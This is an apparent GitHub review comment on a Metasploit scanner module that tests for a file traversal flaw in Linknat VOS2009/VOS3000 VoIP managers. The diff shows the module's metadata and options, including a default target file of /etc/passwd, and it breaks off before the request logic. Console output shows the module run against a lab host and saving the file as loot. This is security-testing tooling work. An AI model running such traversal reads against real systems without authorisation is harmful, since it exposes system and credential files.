modules/auxiliary/scanner/http/linknat_vos_traversal.rb

```diff
@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Linknat Vos Manager Traversal',
+      'Description' => %q(
+        This module attempts to test whether a file traversal vulnerability
+        is present in version of linknat vos2009/vos3000
+      ),
+      'References' => [
+        ['URL', 'http://www.linknat.com/'],
+        ['URL', 'http://www.wooyun.org/bugs/wooyun-2010-0145458']
+      ],
+      'Author'         => ['Nixawk'],
+      'License'        => MSF_LICENSE))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'The path of Linknat Vos Manager (/chs/, /cht/, /eng/)', '/eng/']),
+        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+        OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 5])
+      ], self.class)
+  end
+
+  def vos_uri(path)
+    full_uri =~ %r{/$} ? "#{full_uri}#{path}" : "#{full_uri}/#{path}"
```

Comment:
Thanks @jlee-r7 ```vos_uri``` will give us more readable output that ```normalize_uri```.

**normalize_uri(target_ui, path)**

```
msf auxiliary(linknat_vos_traversal) > show options 

Module options (auxiliary/scanner/http/linknat_vos_traversal):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   FILEPATH         /etc/passwd      yes       The path to the file to read
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS           192.168.1.105    yes       The target address range or CIDR identifier
   RPORT            80               yes       The target port
   SSL              false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI        /eng/            yes       The path of Linknat Vos Manager (/chs/, /cht/, /eng/)
   THREADS          1                yes       The number of concurrent threads
   TRAVERSAL_DEPTH  5                yes       Traversal depth
   VHOST                             no        HTTP server virtual host

msf auxiliary(linknat_vos_traversal) > run 

[*] /eng/js/lang_en_us.js - HTTP/1.1 200 OK
[+] http://192.168.1.105/eng/ - File saved in: /Users/Open-Security/.msf4/loot/20160219000747_default_192.168.1.105_VOS20092.1.2.0_055440.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

**vos_uri(uri)**
```
msf auxiliary(linknat_vos_traversal) > run 

[*] http://192.168.1.105/eng/js/lang_en_us.js - HTTP/1.1 200 OK
[+] http://192.168.1.105/eng/ - File saved in: /Users/Open-Security/.msf4/loot/20160219001051_default_192.168.1.105_VOS20092.1.2.0_073400.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```